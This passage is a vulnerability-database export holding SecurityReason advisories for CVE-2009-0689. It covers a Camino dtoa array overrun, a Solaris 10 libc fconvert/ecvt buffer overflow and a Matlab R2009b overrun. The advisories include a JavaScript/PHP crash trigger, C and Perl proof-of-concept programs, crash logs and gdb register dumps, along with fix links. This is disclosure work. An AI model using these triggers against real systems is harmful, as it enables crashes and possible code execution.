"https://packetstormsecurity.com/files/83738/Camino-1.6.10-Remote-Array-Overrun.html", "sourceData": "`[ Camino 1.6.10 Remote Array Overrun (Arbitrary code execution) ] \n \nAuthor: Maksymilian Arciemowicz and sp3x \nhttp://SecurityReason.com \nDate: \n- Dis.: 07.05.2009 \n- Pub.: 11.12.2009 \n \nCVE: CVE-2009-0689 \nCWE: CWE-119 \nRisk: High \nRemote: Yes \n \nAffected Software: \n- Camino 1.6.10 \n \nFixed in: \n- Camino 2.0 <= \n \nNOTE: Prior versions may also be affected. \n \nOriginal URL: \nhttp://securityreason.com/achievement_securityalert/76 \n \n \n--- 0.Description --- \nCamino (from the Spanish word camino meaning \"way\", \"path\" or \"road\") is \na free, open source, GUI-based Web browser based on Mozilla's Gecko \nlayout engine and specifically designed for the Mac OS X operating \nsystem. In place of an XUL-based user interface used by most \nMozilla-based applications, Camino uses Mac-native Cocoa APIs, although \nit does not use native text boxes. \n \n--- 1. Camino 1.6.10 Remote Array Overrun (Arbitrary code execution) --- \nThe main problem exist in dtoa implementation. Camino has the same dtoa \nas Firefox, SeaMonkey, Chrome, Opera etc. \nand it is the same like SREASONRES:20090625. \n \nhttp://securityreason.com/achievement_securityalert/63 \n \nbut fix for SREASONRES:20090625, used by openbsd was not good. \nMore information about fix for openbsd and similars SREASONRES:20091030, \n \nhttp://securityreason.com/achievement_securityalert/69 \n \nWe can create any number of float, which will overwrite the memory. In \nKmax has defined 15. Functions in dtoa, don't checks Kmax limit, and \nit is possible to call 16<= elements of freelist array. \n \n \n--- 2. Proof of Concept (PoC) --- \n----------------------- \n<script> \nvar a=0.<?php echo str_repeat(\"1\",296450); ?>; \n</script> \n----------------------- \n \nProcess: Camino [153] \nPath: /Volumes/Camino/Camino.app/Contents/MacOS/Camino \nIdentifier: org.mozilla.camino \nVersion: 1.6.10 (1609.09.25) \nCode Type: X86 (Native) \nParent Process: launchd [92] \n \nDate/Time: 2009-11-06 12:57:24.698 -0800 \nOS Version: Mac OS X 10.5.6 (9G55) \nReport Version: 6 \n \nException Type: EXC_BAD_ACCESS (SIGSEGV) \nException Codes: KERN_INVALID_ADDRESS at 0x000000007e33d590 \nCrashed Thread: 0 \n \nThread 0 Crashed: \n0 libSystem.B.dylib 0x01d7e325 tiny_malloc_from_free_list \n+ 235 \n1 libSystem.B.dylib 0x01d7710d szone_malloc + 180 \n2 libSystem.B.dylib 0x01d77018 malloc_zone_malloc + 81 \n3 libSystem.B.dylib 0x01d76fac malloc + 55 \n4 libxpcom_core.dylib 0x00c5271d PL_DHashTableInit + 220 \n5 org.mozilla.camino 0x00389bac RuleHash::RuleHash(int) + 282 \n6 org.mozilla.camino 0x0038ae0e \nnsCSSRuleProcessor::GetRuleCascade(nsPresContext*) + 146 \n7 org.mozilla.camino 0x0038b215 \nnsCSSRuleProcessor::RulesMatching(PseudoRuleProcessorData*) + 27 \n8 org.mozilla.camino 0x003afbd0 \nEnumPseudoRulesMatching(nsIStyleRuleProcessor*, void*) + 24 \n9 org.mozilla.camino 0x003b0885 nsStyleSet::FileRules(int \n(*)(nsIStyleRuleProcessor*, void*), RuleProcessorData*) + 37 \n10 org.mozilla.camino 0x003b0c77 \nnsStyleSet::ResolvePseudoStyleFor(nsIContent*, nsIAtom*, \nnsStyleContext*, nsICSSPseudoComparator*) + 123 \n11 org.mozilla.camino 0x002cc924 \nnsCSSFrameConstructor::ConstructRootFrame(nsIContent*, nsIFrame**) + 134 \n12 org.mozilla.camino 0x002f617b \nPresShell::InitialReflow(int, int) + 1151 \n13 org.mozilla.camino 0x005a90d4 \nnsContentSink::StartLayout(int) + 342 \n14 org.mozilla.camino 0x00483354 \nHTMLContentSink::StartLayout() + 82 \n15 org.mozilla.camino 0x00486cb7 \nHTMLContentSink::OpenBody(nsIParserNode const&) + 193 \n16 org.mozilla.camino 0x001a60e8 \nCNavDTD::OpenBody(nsCParserNode const*) + 54 \n17 org.mozilla.camino 0x001a8b53 \nCNavDTD::HandleDefaultStartToken(CToken*, nsHTMLTag, nsCParserNode*) + 393 \n18 org.mozilla.camino 0x001aa3e5 \nCNavDTD::HandleStartToken(CToken*) + 623 \n19 org.mozilla.camino 0x001aaaa2 \nCNavDTD::HandleToken(CToken*, nsIParser*) + 1358 \n20 org.mozilla.camino 0x001a9a4d \nCNavDTD::BuildModel(nsIParser*, nsITokenizer*, nsITokenObserver*, \nnsIContentSink*) + 165 \n21 org.mozilla.camino 0x001a94ee \nCNavDTD::DidBuildModel(unsigned int, int, nsIParser*, nsIContentSink*) + 550 \n22 org.mozilla.camino 0x001b5e28 \nnsParser::DidBuildModel(unsigned int) + 90 \n23 org.mozilla.camino 0x001b83c7 nsParser::ResumeParse(int, \nint, int) + 661 \n24 org.mozilla.camino 0x001b59a8 \nnsParser::OnStopRequest(nsIRequest*, nsISupports*, unsigned int) + 128 \n25 org.mozilla.camino 0x002076a0 \nnsDocumentOpenInfo::OnStopRequest(nsIRequest*, nsISupports*, unsigned \nint) + 88 \n26 org.mozilla.camino 0x000f522a \nnsFileChannel::OnStopRequest(nsIRequest*, nsISupports*, unsigned int) + 78 \n27 org.mozilla.camino 0x000baf18 \nnsInputStreamPump::OnStateStop() + 88 \n28 org.mozilla.camino 0x000bb49d \nnsInputStreamPump::OnInputStreamReady(nsIAsyncInputStream*) + 133 \n29 libxpcom_core.dylib 0x00cb7d4d nsAStreamCopier::Process() \n+ 751 \n30 libxpcom_core.dylib 0x00c8f251 PL_HandleEvent + 21 \n31 libxpcom_core.dylib 0x00c8f50a PL_ProcessPendingEvents + 103 \n32 com.apple.CoreFoundation 0x014455f5 CFRunLoopRunSpecific + 3141 \n33 com.apple.CoreFoundation 0x01445cd8 CFRunLoopRunInMode + 88 \n34 com.apple.HIToolbox 0x02d8b2c0 RunCurrentEventLoopInMode \n+ 283 \n35 com.apple.HIToolbox 0x02d8b0d9 ReceiveNextEventCommon + 374 \n36 com.apple.HIToolbox 0x02d8af4d \nBlockUntilNextEventMatchingListInMode + 106 \n37 com.apple.AppKit 0x05e94d7d _DPSNextEvent + 657 \n38 com.apple.AppKit 0x05e94630 -[NSApplication \nnextEventMatchingMask:untilDate:inMode:dequeue:] + 128 \n39 com.apple.AppKit 0x05e8d66b -[NSApplication run] + 795 \n40 com.apple.AppKit 0x05e5a8a4 NSApplicationMain + 574 \n41 org.mozilla.camino 0x0000364c main + 196 \n42 org.mozilla.camino 0x00002f1e _start + 216 \n43 org.mozilla.camino 0x00002e45 start + 41 \n \nThread 1: \n0 libSystem.B.dylib 0x01dad30a \nselect$DARWIN_EXTSN$NOCANCEL + 10 \n1 libnspr4.dylib 0x00d3940e poll + 258 \n2 libnspr4.dylib 0x00d35cc6 PR_Poll + 134 \n3 org.mozilla.camino 0x000cb897 \nnsSocketTransportService::Poll(unsigned int*) + 99 \n4 org.mozilla.camino 0x000cbe75 \nnsSocketTransportService::Run() + 497 \n5 libxpcom_core.dylib 0x00c91baf nsThread::Main(void*) + 41 \n6 libnspr4.dylib 0x00d37309 _pt_root + 150 \n7 libSystem.B.dylib 0x01da7095 _pthread_start + 321 \n8 libSystem.B.dylib 0x01da6f52 thread_start + 34 \n \nThread 2: \n0 libSystem.B.dylib 0x01d76226 \nsemaphore_timedwait_signal_trap + 10 \n1 libSystem.B.dylib 0x01da81ef _pthread_cond_wait + 1244 \n2 libSystem.B.dylib 0x01df2aaf pthread_cond_timedwait + 47 \n3 libnspr4.dylib 0x00d32970 pt_TimedWait + 207 \n4 libnspr4.dylib 0x00d32cc7 PR_WaitCondVar + 75 \n5 libxpcom_core.dylib 0x00c93be2 TimerThread::Run() + 74 \n6 libxpcom_core.dylib 0x00c91baf nsThread::Main(void*) + 41 \n7 libnspr4.dylib 0x00d37309 _pt_root + 150 \n8 libSystem.B.dylib 0x01da7095 _pthread_start + 321 \n9 libSystem.B.dylib 0x01da6f52 thread_start + 34 \n \nThread 3: \n0 libSystem.B.dylib 0x01d76226 \nsemaphore_timedwait_signal_trap + 10 \n1 libSystem.B.dylib 0x01da81ef _pthread_cond_wait + 1244 \n2 libSystem.B.dylib 0x01df2aaf pthread_cond_timedwait + 47 \n3 libnspr4.dylib 0x00d32970 pt_TimedWait + 207 \n4 libnspr4.dylib 0x00d32cc7 PR_WaitCondVar + 75 \n5 org.mozilla.camino 0x000b539d \nnsIOThreadPool::ThreadFunc(void*) + 145 \n6 libnspr4.dylib 0x00d37309 _pt_root + 150 \n7 libSystem.B.dylib 0x01da7095 _pthread_start + 321 \n8 libSystem.B.dylib 0x01da6f52 thread_start + 34 \n \nThread 4: \n0 libSystem.B.dylib 0x01d7d3ae __semwait_signal + 10 \n1 libSystem.B.dylib 0x01da7d0d pthread_cond_wait$UNIX2003 \n+ 73 \n2 com.apple.QuartzCore 0x052c6ab9 fe_fragment_thread + 54 \n3 libSystem.B.dylib 0x01da7095 _pthread_start + 321 \n4 libSystem.B.dylib 0x01da6f52 thread_start + 34 \n \nThread 5: \n0 libSystem.B.dylib 0x01d76226 \nsemaphore_timedwait_signal_trap + 10 \n1 libSystem.B.dylib 0x01da81ef _pthread_cond_wait + 1244 \n2 libSystem.B.dylib 0x01df2aaf pthread_cond_timedwait + 47 \n3 libnspr4.dylib 0x00d32970 pt_TimedWait + 207 \n4 libnspr4.dylib 0x00d32cc7 PR_WaitCondVar + 75 \n5 org.mozilla.camino 0x000d43ce \nnsHostResolver::GetHostToLookup(nsHostRecord**) + 212 \n6 org.mozilla.camino 0x000d4b2d \nnsHostResolver::ThreadFunc(void*) + 123 \n7 libnspr4.dylib 0x00d37309 _pt_root + 150 \n8 libSystem.B.dylib 0x01da7095 _pthread_start + 321 \n9 libSystem.B.dylib 0x01da6f52 thread_start + 34 \n \nThread 6: \n0 libSystem.B.dylib 0x01dc56f2 select$DARWIN_EXTSN + 10 \n1 libSystem.B.dylib 0x01da7095 _pthread_start + 321 \n2 libSystem.B.dylib 0x01da6f52 thread_start + 34 \n \nThread 7: \n0 libSystem.B.dylib 0x01d76226 \nsemaphore_timedwait_signal_trap + 10 \n1 libSystem.B.dylib 0x01da81ef _pthread_cond_wait + 1244 \n2 libSystem.B.dylib 0x01df2aaf pthread_cond_timedwait + 47 \n3 libnspr4.dylib 0x00d32970 pt_TimedWait + 207 \n4 libnspr4.dylib 0x00d32cc7 PR_WaitCondVar + 75 \n5 org.mozilla.camino 0x000b539d \nnsIOThreadPool::ThreadFunc(void*) + 145 \n6 libnspr4.dylib 0x00d37309 _pt_root + 150 \n7 libSystem.B.dylib 0x01da7095 _pthread_start + 321 \n8 libSystem.B.dylib 0x01da6f52 thread_start + 34 \n \nThread 0 crashed with X86 Thread State (32-bit): \neax: 0xf8051a22 ebx: 0x01d7e255 ecx: 0x07e8fca0 edx: 0x7e33d590 \nedi: 0x07d5c000 esi: 0x07e00000 ebp: 0xbfffe208 esp: 0xbfffe190 \nss: 0x0000001f efl: 0x00010206 eip: 0x01d7e325 cs: 0x00000017 \nds: 0x0000001f es: 0x0000001f fs: 0x00000000 gs: 0x00000037 \ncr2: 0x7e33d590 \n \n--- 3. SecurityReason Note --- \nOfficialy SREASONRES:20090625 has been detected in: \n- OpenBSD \n- NetBSD \n- FreeBSD \n- MacOSX \n- Google Chrome \n- Mozilla Firefox \n- Mozilla Seamonkey \n- Mozilla Thunderbird \n- Mozilla Sunbird \n- Mozilla Camino \n- KDE (example: konqueror) \n- Opera \n- K-Meleon \n- F-Lock \n \nThis list is not yet closed. \n \n--- 4. Fix --- \nNetBSD fix (optimal): \nhttp://cvsweb.netbsd.org/bsdweb.cgi/src/lib/libc/gdtoa/gdtoaimp.h \n \nOpenBSD fix: \nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/sum.c \nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtorx.c \nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtord.c \nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtorQ.c \nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtof.c \nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtodg.c \nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtod.c \nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/smisc.c \nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/misc.c \nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/hdtoa.c \nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/gethex.c \nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/gdtoa.h \nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/dtoa.c \nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/dmisc.c \nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/stdio/vfprintf.c \nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/arch/vax/gdtoa/strtof.c \nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtorxL.c \nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtorf.c \nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtordd.c \nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtopxL.c \nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtopx.c \nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtopf.c \nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtopdd.c \nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtopd.c \nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtopQ.c \nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtodnrp.c \nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtodI.c \nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtoIxL.c \nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtoIx.c \nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtoIg.c \nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtoIf.c \nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtoIdd.c \nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtoId.c \nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtoIQ.c \nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/qnan.c \nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/g_xfmt.c \nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/g_xLfmt.c \nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/g_ffmt.c \nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/g_dfmt.c \nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/g_ddfmt.c \nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/g__fmt.c \nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/g_Qfmt.c \nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/arithchk.c \nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/stdlib/gcvt.c \nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/stdlib/ecvt.c \n \n \n--- 5. Credits --- \nDiscovered by sp3x and Maksymilian Arciemowicz from SecurityReason.com. \n \n \n--- 6. Greets --- \nInfospec p_e_a pi3 \n \n \n--- 7. Contact --- \nEmail: \n- cxib {a.t] securityreason [d0t} com \n- sp3x {a.t] securityreason [d0t} com \n \nGPG: \n- http://securityreason.com/key/Arciemowicz.Maksymilian.gpg \n- http://securityreason.com/key/sp3x.gpg \n \nhttp://securityreason.com/ \nhttp://securityreason.pl/ \n \n \n`\n", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://packetstormsecurity.com/files/download/83738/camino-overrun.txt"}, {"lastseen": "2016-12-05T22:21:53", "description": "", "published": "2010-05-22T00:00:00", "type": "packetstorm", "title": "Sun Solaris 10 libc/*convert Buffer Overflow", "bulletinFamily": "exploit", "cvelist": ["CVE-2009-0689"], "modified": "2010-05-22T00:00:00", "id": "PACKETSTORM:89801", "href": "https://packetstormsecurity.com/files/89801/Sun-Solaris-10-libc-convert-Buffer-Overflow.html", "sourceData": "`-----BEGIN PGP SIGNED MESSAGE----- \nHash: SHA1 \n \n[ Sun Solaris 10 libc/*convert (*cvt) buffer overflow ] \n \nAuthor: Maksymilian Arciemowicz \nhttp://SecurityReason.com \nDate: \n- - Dis.: 15.04.2010 \n- - Pub.: 21.05.2010 \n \nAffected Software: \n- - Sun Solaris 10 10/9 \n \nOriginal URL: \nhttp://securityreason.com/achievement_securityalert/86 \n \n \n- --- 0.Description --- \nSYNOPSIS \n#include <floatingpoint.h> \n \nchar *econvert(double value, int ndigit, int *decpt, int \n*sign, char *buf); \n \nchar *fconvert(double value, int ndigit, int *decpt, int \n*sign, char *buf); \n \nchar *gconvert(double value, int ndigit, int trailing, char \n*buf); \n \nchar *seconvert(single *value, int ndigit, int *decpt, int \n*sign, char *buf); \n \nchar *sfconvert(single *value, int ndigit, int *decpt, int \n*sign, char *buf); \n \nchar *sgconvert(single *value, int ndigit, int trailing, \nchar *buf); \n \nchar *qeconvert(quadruple *value, int ndigit, int *decpt, \nint *sign, char *buf); \n \nchar *qfconvert(quadruple *value, int ndigit, int *decpt, \nint *sign, char *buf); \n \nchar *qgconvert(quadruple *value, int ndigit, int trailing, \nchar *buf); \n \nThe econvert() function converts the value to a null- \nterminated string of ndigit ASCII digits in buf and returns \na pointer to buf. buf should contain at least ndigit+1 char- \nacters. The position of the decimal point relative to the \nbeginning of the string is stored indirectly through decpt. \nThus buf == \"314\" and *decpt == 1 corresponds to the numeri- \ncal value 3.14, while buf == \"314\" and *decpt == -1 \ncorresponds to the numerical value .0314. If the sign of the \nresult is negative, the word pointed to by sign is nonzero; \notherwise it is zero. The least significant digit is \nrounded. \n \nSYNOPSIS \n#include <stdlib.h> \n \nchar *ecvt(double value, int ndigit, int *restrict decpt, \nint *restrict sign); \n \nchar *fcvt(double value, int ndigit, int *restrict decpt, \nint *restrict sign); \n \nchar *gcvt(double value, int ndigit, char *buf); \n \nDESCRIPTION \nThe ecvt(), fcvt() and gcvt() functions convert floating- \npoint numbers to null-terminated strings. \n \n \n- --- 1. Sun Solaris 10 libc/*convert (*cvt) buffer overflow --- \nThe main problem exists in sun solaris libc. OpenSolaris is not affected. \n \nPoC: \n- --- \n# cat jaja.c \n#include <stdio.h> \n#include <stdlib.h> \n \nint main (int argc, char *argv[]){ \n \nchar number[10000]; \n \nint a,b; \n \nprintf(\"%s\", fconvert((double)0,atoi(argv[1]),&a,&b,number)); \nreturn 0; \n} \n \n# /usr/local/bin/gcc -o jaja jaja.c \n# ./jaja 16 \n0000000000000000# \n# ./jaja 512 \n00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000# \n- --- \n \nfor 512 will work fine, because we have used (double)0 to convert. When \nwe use no zero value, then crash. \n \nok. let`s set no zero value in jaja2.c \n \nPoc: \n- --- \n# cat jaja2.c \n#include <stdio.h> \n#include <stdlib.h> \n \nint main (int argc, char *argv[]){ \n \nchar number[10000]; \n \nint a,b; \n \nprintf(\"%s\", fconvert((double)1,atoi(argv[1]),&a,&b,number)); \nreturn 0; \n} \n \n# /usr/local/bin/gcc -o jaja2 jaja2.c \n# ./jaja2 512 \nSegmentation fault (core dumped) \n# /usr/local/bin/gdb -q jaja2 \n(no debugging symbols found) \n(gdb) r 512 \nStarting program: /jaja2 512 \n(no debugging symbols found) \n(no debugging symbols found) \n \nProgram received signal SIGSEGV, Segmentation fault. \n0xfeeab05c in fconvert () from /lib/libc.so.1 \n(gdb) i r \neax 0x8047240 134509120 \necx 0x3250 12880 \nedx 0x8048000 134512640 \nebx 0xfef9e000 -17178624 \nesp 0x8044b38 0x8044b38 \nebp 0x8044d68 0x8044d68 \nesi 0x200 512 \nedi 0x0 0 \neip 0xfeeab05c 0xfeeab05c <fconvert+163> \neflags 0x10206 [ PF IF RF ] \ncs 0x3b 59 \nss 0x43 67 \nds 0x43 67 \nes 0x43 67 \nfs 0x0 0 \ngs 0x1c3 451 \n(gdb) x/x $edx \n0x8048000: Cannot access memory at address 0x8048000 \n(gdb) \n- --- \n \nthe same result we can get with perl(1) \n \nPoC perl: \n- --- \n#!/usr/local/bin/perl \nprintf \"%.512f\", 1; \n# perl pss.pl \nSegmentation Fault - core dumped \n# /usr/local/bin/gdb -q perl \n(no debugging symbols found) \n(gdb) r pss.pl \nStarting program: /usr/bin/perl pss.pl \n(no debugging symbols found) \n(no debugging symbols found) \n(no debugging symbols found) \n(no debugging symbols found) \n(no debugging symbols found) \n(no debugging symbols found) \n(no debugging symbols found) \n \nProgram received signal SIGSEGV, Segmentation fault. \n0xfed7b05c in fconvert () from /lib/libc.so.1 \n- --- \n \nok. \n \nfunction like *cvt(3) are also affected. let`s check ecvt(3) \n \nPoC: \n- --- \n# cat jaja3.c \n#include <stdio.h> \n#include <stdlib.h> \n \nint main (int argc, char *argv[]){ \n \nint a,b; \n \nprintf(\"%s\", ecvt((double)1,atoi(argv[1]),&a,&b)); \nreturn 0; \n} \n \n# ./jaja3 3405 \n%Y....[some_part_of_memory] \n# \n- --- \n \nit`s look like a memory disclosure \n \nlet's see bigger value \n \nPoC: \n- --- \n# ./jaja3 3500 \nSegmentation fault (core dumped) \n- --- \n \nnow is the time to debug it \n \nPoC: \n- --- \n# /usr/local/bin/gdb -q jaja3 \n(no debugging symbols found) \n(gdb) \n(gdb) r 4000 \nStarting program: /jaja3 4000 \n(no debugging symbols found) \n(no debugging symbols found) \n \nProgram received signal SIGSEGV, Segmentation fault. \n0xfeeaaf72 in econvert () from /lib/libc.so.1 \n(gdb) i r \neax 0xf00 3840 \necx 0xdac 3500 \nedx 0xfef929ab -17225301 \nebx 0xfef9e000 -17178624 \nesp 0x8047230 0x8047230 \nebp 0x8047460 0x8047460 \nesi 0xfa0 4000 \nedi 0x1 1 \neip 0xfeeaaf72 0xfeeaaf72 <econvert+144> \neflags 0x10287 [ CF PF SF IF RF ] \ncs 0x3b 59 \nss 0x43 67 \nds 0x43 67 \nes 0x43 67 \nfs 0x0 0 \ngs 0x1c3 451 \n- --- \n \neip can be differ, not ever in econvert+144 \n \nPoC: \n- --- \n(gdb) r 3501111111 \nThe program being debugged has been started already. \nStart it from the beginning? (y or n) y \nStarting program: /jaja3 3501111111 \n[New LWP 1 ] \n(no debugging symbols found) \n(no debugging symbols found) \n \nProgram received signal SIGSEGV, Segmentation fault. \n0xfeeaaf89 in econvert () from /lib/libc.so.1 \n(gdb) i r \neax 0xcfa7d347 -811084985 \necx 0x0 0 \nedx 0x1 1 \nebx 0xfef9e000 -17178624 \nesp 0x8047230 0x8047230 \nebp 0x8047460 0x8047460 \nesi 0xd0aeb747 -793856185 \nedi 0x1 1 \neip 0xfeeaaf89 0xfeeaaf89 <econvert+167> \neflags 0x10287 [ CF PF SF IF RF ] \ncs 0x3b 59 \nss 0x43 67 \nds 0x43 67 \nes 0x43 67 \nfs 0x0 0 \ngs 0x1c3 451 \n- --- \n \nand not ever should crash in econvert \n \nvery interesting behavior, we can see in printf(1) program \n \nPoC: \n- --- \n# /usr/local/bin/gdb -q printf \n(no debugging symbols found) \n(gdb) r %.011111f 0 \nStarting program: /usr/bin/printf %.011111f 0 \n(no debugging symbols found) \n(no debugging symbols found) \n(no debugging symbols found) \n \nProgram received signal SIGSEGV, Segmentation fault. \n0xfeea48da in _malloc_unlocked () from /lib/libc.so.1 \n(gdb) r %.0111111f 0 \nThe program being debugged has been started already. \nStart it from the beginning? (y or n) y \n \nStarting program: /usr/bin/printf %.0111111f 0 \n[New LWP 1 ] \n(no debugging symbols found) \n(no debugging symbols found) \n(no debugging symbols found) \n \nProgram received signal SIGSEGV, Segmentation fault. \n0xfee852ab in memcpy () from /lib/libc.so.1 \n \n(gdb) r %.0111111f 1 \nThe program being debugged has been started already. \nStart it from the beginning? (y or n) y \n \nStarting program: /usr/bin/printf %.0111111f 1 \n[New LWP 1 ] \n(no debugging symbols found) \n(no debugging symbols found) \n(no debugging symbols found) \n \nProgram received signal SIGSEGV, Segmentation fault. \n0xfee8b05c in fconvert () from /lib/libc.so.1 \n(gdb) x/i $eip \n0xfee8b05c <fconvert+163>: mov %al,(%edx) \n- --- \n \nfor printf(1) we have get eip in: \n- - fconvert+163 (the same like in jaja2=512) \n- - memcpy \n- - _malloc_unlocked \n- - others \n \nthis vuln is very similar to CVE-2009-0689 but we don't have founded \npart of gdtoa license in Oracle license and bahavior for above examples \nare differs as in CVE-2009-0689. \n \nhttp://src.opensolaris.org/source/xref/onnv/onnv-gate/usr/src/lib/libbc/libc/gen/common/ecvt.c \n \n- --- \n34 char * \n35 ecvt(arg, ndigits, decpt, sign) \n36 double arg; \n37 int ndigits, *decpt, *sign; \n38 { \n39 if (efcvtbuffer == NULL) \n40 efcvtbuffer = (char *)calloc(1,1024); \n41 return econvert(arg, ndigits, decpt, sign, efcvtbuffer); \n42 } \n43 \n- --- \n \nefcvtbuffer = (char *)calloc(1,1024); \nand ndigits is bigger from efcvtbuffer size. \n \nnow we show econvert(), \n \nhttp://src.opensolaris.org/source/xref/onnv/onnv-gate/usr/src/lib/libbc/libc/gen/common/econvert.c \n \n- --- \n34 econvert(arg, ndigits, decpt, sign, buf) \n35 double arg; \n36 int ndigits, *decpt, *sign; \n37 char *buf; \n38 { \n39 decimal_mode dm; \n40 decimal_record dr; \n41 fp_exception_field_type ef; \n42 int i; \n43 char *pc; \n44 int nc; \n45 \n46 dm.rd = fp_direction; /* Rounding direction. */ \n47 dm.df = floating_form; /* E format. */ \n48 dm.ndigits = ndigits; /* Number of significant digits. */ \n49 double_to_decimal(&arg, &dm, &dr, &ef); \n50 *sign = dr.sign; \n51 switch (dr.fpclass) { \n52 case fp_normal: \n53 case fp_subnormal: \n54 *decpt = dr.exponent + ndigits; \n55 for (i = 0; i < ndigits; i++) \n56 buf[i] = dr.ds[i]; \n57 buf[ndigits] = 0; \n58 break; \n- --- \n \nline 55 and 56 show buffer overflow. \n \nWe do not know why, but the OpenSolaris project, contains a security \npatch and the project is vulnerable SunOS. \n \n \n- --- 2. Fix --- \nSun bug 5105920 \n \nOpenSolaris has removed this issue without realizing the security nature \nof the bug. \n \n \n- --- 3. Greets --- \nsp3x Infospec pi3 \n \n \n- --- 4. Contact --- \nAuthor: SecurityReason.com [ Maksymilian Arciemowicz ] \n \nEmail: \n- - cxib {a\\./t] securityreason [d=t} com \n \nGPG: \n- - http://securityreason.com/key/Arciemowicz.Maksymilian.gpg \n \nhttp://securityreason.com/ \nhttp://securityreason.com/exploit_alert/ - Exploit Database \nhttp://securityreason.com/security_alert/ - Vulnerability Database \n-----BEGIN PGP SIGNATURE----- \n \niEYEARECAAYFAkv2fz0ACgkQpiCeOKaYa9aStgCcCZb2uawbEXy9yJIjfCAPRQFS \nB/cAnRGVewtJnM/CBuZk6PHKp9LJrf2q \n=AMPU \n-----END PGP SIGNATURE----- \n \n`\n", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://packetstormsecurity.com/files/download/89801/solaris10libc-overflow.txt"}, {"lastseen": "2016-12-05T22:13:29", "description": "", "published": "2010-01-09T00:00:00", "type": "packetstorm", "title": "Matlab R2009b Array Overrun", "bulletinFamily": "exploit", "cvelist": ["CVE-2009-0689"], "modified": "2010-01-09T00:00:00", "id": "PACKETSTORM:84946", "href": "https://packetstormsecurity.com/files/84946/Matlab-R2009b-Array-Overrun.html", "sourceData": "`[ Matlab R2009b Array Overrun (code execution) ] \n \nAuthor: Maksymilian Arciemowicz and sp3x \nhttp://SecurityReason.com \nDate: \n- Dis.: 07.05.2009 \n- Pub.: 08.01.2009 \n \nCVE: CVE-2009-0689 \nCWE: CWE-119 \nRisk: High \nRemote: Yes \n \nAffected Software: \n- Matlab R2009b \n \nNOTE: Prior versions may also be affected. \n \nOriginal URL: \nhttp://securityreason.com/achievement_securityalert/80 \n \n \n--- 0.Description --- \nMATLAB is a numerical computing environment and fourth generation \nprogramming language. Developed by The MathWorks, MATLAB allows matrix \nmanipulation, plotting of functions and data, implementation of \nalgorithms, creation of user interfaces, and interfacing with programs \nin other languages. Although it is numeric only, an optional toolbox \nuses the MuPAD symbolic engine, allowing access to computer algebra \ncapabilities. An additional package, Simulink, adds graphical \nmultidomain simulation and Model-Based Design for dynamic and embedded \nsystems. \n \nIn 2004, MathWorks claimed that MATLAB was used by more than one million 